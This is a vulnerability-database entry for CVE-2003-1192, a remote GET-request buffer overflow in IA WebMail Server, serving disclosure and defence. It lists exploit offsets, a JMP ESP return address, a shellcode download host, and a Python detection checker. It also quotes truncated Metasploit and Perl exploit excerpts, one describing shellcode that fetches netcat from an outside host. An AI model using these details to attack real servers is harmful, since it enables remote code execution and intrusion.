CVE-2003-1192
published 2003-11-03
CVE-2003-1192: Stack-based buffer overflow in IA WebMail Server 3.1.0 allows remote attackers to execute arbitrary code via a long GET request.
Priority P2 · 60 · critical · 10 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT · EPSS 69.17% (99.3rd percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| truenorth_software | ia_webmail_server | — | — |
| truenorth_software | ia_webmail_server | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x4c\xf8\x12 (EIP overwrite return address, offset 1040)
- bytes: \x33\xBD\x02\x10 (JMP ESP in iaregdll.dll, EIP overwrite at offset 1036+4)
- bytes: 0x1002bd33 (Metasploit Ret address for IA WebMail 3.x)
- Flag HTTP GET requests to port 8180 where the URI length exceeds 1036 bytes, consistent with all known exploit variants
- Presence of the literal string 'META' at offset 1036 in the GET URI is a Metasploit-specific exploit marker
- Bad characters for payload encoding include null bytes and common HTTP special characters; presence of raw binary in the GET URI path is anomalous
- Shellcode in the exploit variant (exploit-db 124) downloads a file from elitehaven.net; monitor for outbound connections to that domain or creation of c:\nc.exe
- The exploit targets iaregdll.dll version 1.0.0.5 using a static JMP ESP gadget; presence of this DLL version on a web server is an indicator of a vulnerable target
- Caveat: the Metasploit module explicitly states it has not been tested against a live system; the return address (0x1002bd33) and buffer length (1036) may not be reliable across all patch levels
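The first three detection notes above can be combined into one request-level check. The following is an added example written for this page, not code from any of the indexed sources: it assumes a collector that hands over the destination port and the raw bytes of each HTTP request, and the sample requests embedded in it are constructed.

```python
import re

# Thresholds and markers taken from the detection notes for CVE-2003-1192.
IA_WEBMAIL_PORT = 8180
URI_LENGTH_THRESHOLD = 1036
METASPLOIT_MARKER = b"META"
MARKER_OFFSET = 1036

# Request line: METHOD SP request-target SP HTTP-version CRLF.
# \S+ on bytes also consumes non-ASCII bytes, so binary in the target is kept.
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r?\n")


def inspect_request(dst_port: int, raw: bytes) -> list[str]:
    """Return a list of reasons why one raw HTTP request looks like the
    IA WebMail GET overflow; an empty list means nothing matched."""
    reasons: list[str] = []
    if dst_port != IA_WEBMAIL_PORT:
        return reasons
    m = REQUEST_LINE.match(raw)
    if not m or m.group(1) != b"GET":
        return reasons
    uri = m.group(2)
    if len(uri) > URI_LENGTH_THRESHOLD:
        reasons.append(f"GET URI length {len(uri)} exceeds {URI_LENGTH_THRESHOLD}")
    marker_at = MARKER_OFFSET + len(METASPLOIT_MARKER)
    if uri[MARKER_OFFSET:marker_at] == METASPLOIT_MARKER:
        reasons.append(f"'META' marker at URI offset {MARKER_OFFSET}")
    # Anything outside printable ASCII in a request-target is anomalous here.
    if any(b < 0x20 or b > 0x7E for b in uri):
        reasons.append("raw binary bytes in GET URI path")
    return reasons


# Constructed samples (not captured traffic): a normal request and a
# request shaped like the overflow, with 'META' placed at offset 1036.
SAMPLE_BENIGN = b"GET /index.html HTTP/1.0\r\nHost: mail.example\r\n\r\n"
SAMPLE_SUSPECT = (
    b"GET /" + b"A" * 1035 + b"META" + b"\x90\xcc" + b" HTTP/1.0\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", SAMPLE_BENIGN), ("suspect", SAMPLE_SUSPECT)):
        print(label, inspect_request(IA_WEBMAIL_PORT, req) or ["clean"])
```

The length threshold fires on its own for any oversized GET, so the marker and binary checks only add confidence rather than being required for an alert.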
No detection rules found.
Exploit-DB
IA WebMail Server 3.x - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
---
##
# $Id: ia_webmail.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IA WebMail 3.x Buffer Overflow',
'Description' => %q{
This exploits a stack buffer overflow in the IA WebMail server.
This exploit has not been tested against a live system at
this time.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'BID', '8965'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iaw
Exploit-DB
IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow
exploitdb·2003-11-19
---
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
# - www elitehaven net/ncat.exe (downloaded)
# - c:\nc.exe (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I
Exploit-DB
IA WebMail Server 3.0/3.1 - GET Buffer Overrun
exploitdb·2003-11-03
---
source: https://www.securityfocus.com/bid/8965/info
IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution.
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "8180",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$shellcode = join ("",
"\x90", # - NOP
"\xCC", # - INT3
"\x90"
Metasploit
IA WebMail 3.x Buffer Overflow
metasploit
This exploits a stack buffer overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/10107
- http://securitytracker.com/id?1008075
- http://www.derkeiler.com/Mailing-Lists/VulnWatch/2003-11/0001.html
- http://www.elitehaven.net/iawebmail.txt
- http://www.osvdb.org/2757
- http://www.securiteam.com/windowsntfocus/6B002158UQ.html
- http://www.securityfocus.com/bid/8965
- https://exchange.xforce.ibmcloud.com/vulnerabilities/13580
Published: 2003-11-03